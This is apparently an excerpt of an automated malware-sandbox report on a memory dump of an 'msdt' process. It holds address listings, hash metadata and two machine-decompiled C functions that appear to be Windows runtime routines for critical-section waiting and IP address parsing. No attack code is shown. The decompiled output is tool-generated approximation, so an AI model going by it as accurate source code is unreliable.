                                                                            0x0265231d
                                                                            0x02652320
                                                                            0x02652323
                                                                            0x02652323
                                                                            0x02652328
                                                                            0x0265232d
                                                                            0x0265232f
                                                                            0x02652331
                                                                            0x02652336
                                                                            0x02652336
                                                                            0x0265233b
                                                                            0x0265233d
                                                                            0x02652350
                                                                            0x02652351
                                                                            0x02652356
                                                                            0x02652359
                                                                            0x02652359
                                                                            0x0265235b
                                                                            0x0265235d
                                                                            0x02615367
                                                                            0x0261536b
                                                                            0x02615372
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02652363
                                                                            0x02652363
                                                                            0x02652369
                                                                            0x0265236a
                                                                            0x0265236c
                                                                            0x02652371
                                                                            0x02652373
                                                                            0x00000000
                                                                            0x02652379
                                                                            0x02652379
                                                                            0x0265237a
                                                                            0x0265237f
                                                                            0x0265237f
                                                                            0x02652385
                                                                            0x02652386
                                                                            0x02652389
                                                                            0x0265238e
                                                                            0x02652390
                                                                            0x02615378
                                                                            0x0261537c
                                                                            0x02652396
                                                                            0x02652396
                                                                            0x02652397
                                                                            0x0265239c
                                                                            0x026523a2
                                                                            0x026523a3
                                                                            0x026523a6
                                                                            0x026523ab
                                                                            0x026523ad
                                                                            0x00000000
                                                                            0x026523b3
                                                                            0x026523b3
                                                                            0x026523b4
                                                                            0x026523b9
                                                                            0x026523ba
                                                                            0x026523ba
                                                                            0x026523bc
                                                                            0x026523bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02649153
                                                                            0x02649158
                                                                            0x0264915a
                                                                            0x0264915e
                                                                            0x02649160
                                                                            0x00000000
                                                                            0x02649166
                                                                            0x02649166
                                                                            0x02649171
                                                                            0x02649176
                                                                            0x02649176
                                                                            0x00000000
                                                                            0x02649160
                                                                            0x026523c6
                                                                            0x026523cb
                                                                            0x026523ce
                                                                            0x026523d7
                                                                            0x026523d7
                                                                            0x026523ad
                                                                            0x02652390
                                                                            0x02652373
                                                                            0x0265233f
                                                                            0x0265233f
                                                                            0x00000000
                                                                            0x0265233f
                                                                            0x02652291
                                                                            0x02652291
                                                                            0x02652293
                                                                            0x02652295
                                                                            0x0265229a
                                                                            0x026522a1
                                                                            0x026522a3
                                                                            0x026522a7
                                                                            0x026522a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026522ab
                                                                            0x026522ad
                                                                            0x026522af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026522af
                                                                            0x026522b1
                                                                            0x026522b4
                                                                            0x026522b4
                                                                            0x026522b6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x026522b6
                                                                            0x0265228f
                                                                            0x00000000
                                                                            0x0265226d
                                                                            0x026153cb
                                                                            0x026153ce
                                                                            0x026153d0
                                                                            0x026153d4
                                                                            0x026153d6
                                                                            0x00000000
                                                                            0x026153d8
                                                                            0x026153e3
                                                                            0x026153ea
                                                                            0x026153ea
                                                                            0x026153d6
                                                                            0x00000000

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026522F4
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 02652328
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 026522FC
                                                                            • RTL: Resource at %p, xrefs: 0265230B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-871070163
                                                                            • Opcode ID: cfa64d02f852f6cff9b097959ad2513d09dbac8fc354566fedb2fabae872ad1e
                                                                            • Instruction ID: 278380a87ebb73ca197923d0600dd74de0db1916d875a2375ce56a7cfefa8073
                                                                            • Opcode Fuzzy Hash: cfa64d02f852f6cff9b097959ad2513d09dbac8fc354566fedb2fabae872ad1e
                                                                            • Instruction Fuzzy Hash: 8651F771600716ABEB159F68CC90FA67399AF84324F14425DFD49DB380FB71E8418BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0261EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 51%
                                                                            			E0261EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0260DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x26d793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025F16C0(_t39);
				} else {
					_t40 = E025EF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02633915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025F01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x26d793c; // 0x0
								_push(_t85);
								_t44 = E025F1F28(_t71);
							} else {
								_t44 = E025EF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02633915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02672306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0261EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02634FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02643F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02643F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x26d20c0;
								if(_t85 != 0x26d20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0267217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02643F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                            0x0261ec56
                                                                            0x0261ec56
                                                                            0x0261ec56
                                                                            0x0261ec5c
                                                                            0x0261ec64
                                                                            0x026523e6
                                                                            0x026523eb
                                                                            0x026523eb
                                                                            0x0261ec6a
                                                                            0x0261ec6c
                                                                            0x0261ec6f
                                                                            0x026523f3
                                                                            0x026523f8
                                                                            0x026523fa
                                                                            0x026523fc
                                                                            0x0261ec75
                                                                            0x0261ec76
                                                                            0x0261ec76
                                                                            0x0261ec7b
                                                                            0x0261ec7c
                                                                            0x0261ec7e
                                                                            0x02652406
                                                                            0x02652407
                                                                            0x0265240c
                                                                            0x0265240d
                                                                            0x0265240d
                                                                            0x0265240d
                                                                            0x02652414
                                                                            0x02652417
                                                                            0x0265241e
                                                                            0x02652435
                                                                            0x02652438
                                                                            0x0265243c
                                                                            0x0265243f
                                                                            0x02652442
                                                                            0x02652443
                                                                            0x02652446
                                                                            0x02652449
                                                                            0x02652453
                                                                            0x02652455
                                                                            0x0265245b
                                                                            0x0265245b
                                                                            0x0261eb99
                                                                            0x0261eb99
                                                                            0x0261eb9c
                                                                            0x0261eb9d
                                                                            0x0261eb9f
                                                                            0x0261eba2
                                                                            0x02652465
                                                                            0x0265246b
                                                                            0x0265246d
                                                                            0x0261eba8
                                                                            0x0261eba9
                                                                            0x0261eba9
                                                                            0x0261ebae
                                                                            0x0261ebb3
                                                                            0x0261ebb9
                                                                            0x0261ebbb
                                                                            0x02652513
                                                                            0x02652514
                                                                            0x02652519
                                                                            0x0265251b
                                                                            0x0261ec2a
                                                                            0x0261ec2d
                                                                            0x0261ec33
                                                                            0x0261ec36
                                                                            0x0261ec3a
                                                                            0x0261ec3e
                                                                            0x0261ec40
                                                                            0x0261ec47
                                                                            0x0261ec47
                                                                            0x0261ec40
                                                                            0x025f22c6
                                                                            0x0261ebc1
                                                                            0x0261ebc1
                                                                            0x0261ebc5
                                                                            0x0261ec9a
                                                                            0x0261ec9a
                                                                            0x0261ebd6
                                                                            0x0261ebd6
                                                                            0x00000000
                                                                            0x0261ebbb
                                                                            0x02652477
                                                                            0x0265247c
                                                                            0x02652486
                                                                            0x0265248b
                                                                            0x02652496
                                                                            0x0265249b
                                                                            0x0265249d
                                                                            0x026524a0
                                                                            0x026524a3
                                                                            0x026524aa
                                                                            0x026524aa
                                                                            0x026524a5
                                                                            0x026524a5
                                                                            0x026524a5
                                                                            0x026524ac
                                                                            0x026524af
                                                                            0x026524b0
                                                                            0x026524b3
                                                                            0x026524b9
                                                                            0x026524ba
                                                                            0x026524bb
                                                                            0x026524c6
                                                                            0x026524cb
                                                                            0x026524cd
                                                                            0x026524d0
                                                                            0x026524d1
                                                                            0x026524d4
                                                                            0x026524d6
                                                                            0x026524d9
                                                                            0x026524d9
                                                                            0x026524dc
                                                                            0x026524df
                                                                            0x026524e1
                                                                            0x026524e7
                                                                            0x026524e9
                                                                            0x026524ec
                                                                            0x026524ef
                                                                            0x026524f2
                                                                            0x026524f2
                                                                            0x026524ef
                                                                            0x026524e7
                                                                            0x026524fa
                                                                            0x026524ff
                                                                            0x02652501
                                                                            0x02652503
                                                                            0x02652506
                                                                            0x0265250b
                                                                            0x0261eb8c
                                                                            0x0261eb93
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0261eb93
                                                                            0x00000000
                                                                            0x0261eb99
                                                                            0x0261ec85
                                                                            0x0261ec85
                                                                            0x0261ec85
                                                                            0x00000000

                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 026524FA
                                                                            • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 026524BD
                                                                            • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0265248D
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                            • API String ID: 0-3177188983
                                                                            • Opcode ID: 9a0b00b261e43194345339edb840306f050163e6216e878d4174cf172075ec0f
                                                                            • Instruction ID: 04d17b2b575f748d5efd77c9ea5286701d6a03f094d98fe3c34a24143d5724f1
                                                                            • Opcode Fuzzy Hash: 9a0b00b261e43194345339edb840306f050163e6216e878d4174cf172075ec0f
                                                                            • Instruction Fuzzy Hash: 61411870A00215ABDB24DF68CD94F6B77AAEF84320F148609FE659B3C0D731E941CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0262FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0262FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0262EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0262EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0262685D(_t167, 4) == 0) {
								if(E0262685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0262685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0262685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02608980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E025FDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0262EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0262EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                            0x0262fcd1
                                                                            0x0262fcd6
                                                                            0x0262fcd9
                                                                            0x0262fcdc
                                                                            0x0262fcdf
                                                                            0x0262fce2
                                                                            0x0262fce5
                                                                            0x0262fce8
                                                                            0x0262fceb
                                                                            0x0262fced
                                                                            0x0262fced
                                                                            0x0262fcf3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0262fcfc
                                                                            0x0262fcfe
                                                                            0x0262fdc1
                                                                            0x0265ecbd
                                                                            0x00000000
                                                                            0x0265eccc
                                                                            0x0265eccc
                                                                            0x0265ecd2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ecdf
                                                                            0x0265ece0
                                                                            0x0265ece4
                                                                            0x0265eceb
                                                                            0x0265ecee
                                                                            0x0265eca8
                                                                            0x0265eca8
                                                                            0x0265ecaa
                                                                            0x0262fd76
                                                                            0x0262fd79
                                                                            0x0262fdb4
                                                                            0x0262fdb5
                                                                            0x0262fdb6
                                                                            0x00000000
                                                                            0x0262fdb6
                                                                            0x0262fd7e
                                                                            0x0265ecfc
                                                                            0x0262fe2f
                                                                            0x00000000
                                                                            0x0262fe2f
                                                                            0x0265ed08
                                                                            0x0265ed0f
                                                                            0x0265ed17
                                                                            0x0265ed1b
                                                                            0x00000000
                                                                            0x0265ed1b
                                                                            0x0262fd88
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0262fd94
                                                                            0x0262fd99
                                                                            0x0262fda1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0262fdb0
                                                                            0x00000000
                                                                            0x0262fdb0
                                                                            0x0265ecbd
                                                                            0x0262fdc7
                                                                            0x0262fdcb
                                                                            0x00000000
                                                                            0x0262fdd7
                                                                            0x0262fde3
                                                                            0x0262fe06
                                                                            0x02641fe7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02641fef
                                                                            0x02641ff0
                                                                            0x02641ff4
                                                                            0x02641ff7
                                                                            0x02641ffa
                                                                            0x02641ffd
                                                                            0x02642000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ecf1
                                                                            0x00000000
                                                                            0x0265ecf1
                                                                            0x00000000
                                                                            0x0262fe06
                                                                            0x0262fde8
                                                                            0x0262fdec
                                                                            0x0262fdef
                                                                            0x0262fdf2
                                                                            0x00000000
                                                                            0x0262fdf2
                                                                            0x0262fdcb
                                                                            0x0262fd04
                                                                            0x0262fd05
                                                                            0x0265ec67
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ec6f
                                                                            0x00000000
                                                                            0x0265ec6f
                                                                            0x0262fd13
                                                                            0x0262fd3c
                                                                            0x0262fd40
                                                                            0x0265ec75
                                                                            0x0265ec7a
                                                                            0x00000000
                                                                            0x0265ec8a
                                                                            0x0265ec8a
                                                                            0x0265ec90
                                                                            0x0265ecb2
                                                                            0x0262fd73
                                                                            0x0262fd73
                                                                            0x00000000
                                                                            0x0262fd73
                                                                            0x0265ec95
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265eca1
                                                                            0x0265eca4
                                                                            0x0265eca5
                                                                            0x00000000
                                                                            0x0265eca5
                                                                            0x0265ec7a
                                                                            0x0262fd4a
                                                                            0x00000000
                                                                            0x0262fd6e
                                                                            0x0262fd6e
                                                                            0x0262fd71
                                                                            0x00000000
                                                                            0x0262fd71
                                                                            0x0262fd4a
                                                                            0x0262fd21
                                                                            0x0263a3a1
                                                                            0x00000000
                                                                            0x0263a3a1
                                                                            0x0262fd36
                                                                            0x0264200b
                                                                            0x02642012
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x02642018
                                                                            0x00000000
                                                                            0x02642018
                                                                            0x00000000
                                                                            0x0262fd36
                                                                            0x0262fe0f
                                                                            0x0262fe16
                                                                            0x0263a3ad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0263a3b3
                                                                            0x0263a3b3
                                                                            0x0262fe1f
                                                                            0x0265ed25
                                                                            0x0265ed86
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ed91
                                                                            0x0265ed95
                                                                            0x0265ed95
                                                                            0x0265ed9a
                                                                            0x0265edad
                                                                            0x0265edb3
                                                                            0x0265edba
                                                                            0x0265edc4
                                                                            0x0265edc9
                                                                            0x00000000
                                                                            0x0265edcc
                                                                            0x0265ed2a
                                                                            0x0265ed55
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ed61
                                                                            0x0265ed66
                                                                            0x0265ed6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ed7d
                                                                            0x00000000
                                                                            0x0265ed7d
                                                                            0x0265ed30
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0265ed3c
                                                                            0x0265ed43
                                                                            0x0265ed4b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.675434815.00000000025E0000.00000040.00000001.sdmp, Offset: 025D0000, based on PE: true
                                                                            • Associated: 00000007.00000002.675426183.00000000025D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675538711.00000000026C0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675551965.00000000026D0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675564641.00000000026D4000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675587676.00000000026D7000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675623414.00000000026E0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.675712304.0000000002740000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_25d0000_msdt.jbxd
                                                                            Similarity
                                                                            • API ID: __fassign
                                                                            • String ID:
                                                                            • API String ID: 3965848254-0
                                                                            • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                            • Instruction ID: 7493d77a756961aa6d2c36822f6345ff883c559a6a36fb9f0d3e160be65c283f
                                                                            • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                            • Instruction Fuzzy Hash: FE91B131D0062AEEDF29CF98C8447AEB7B4FF41308F20846AD855A7691EB715B49CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%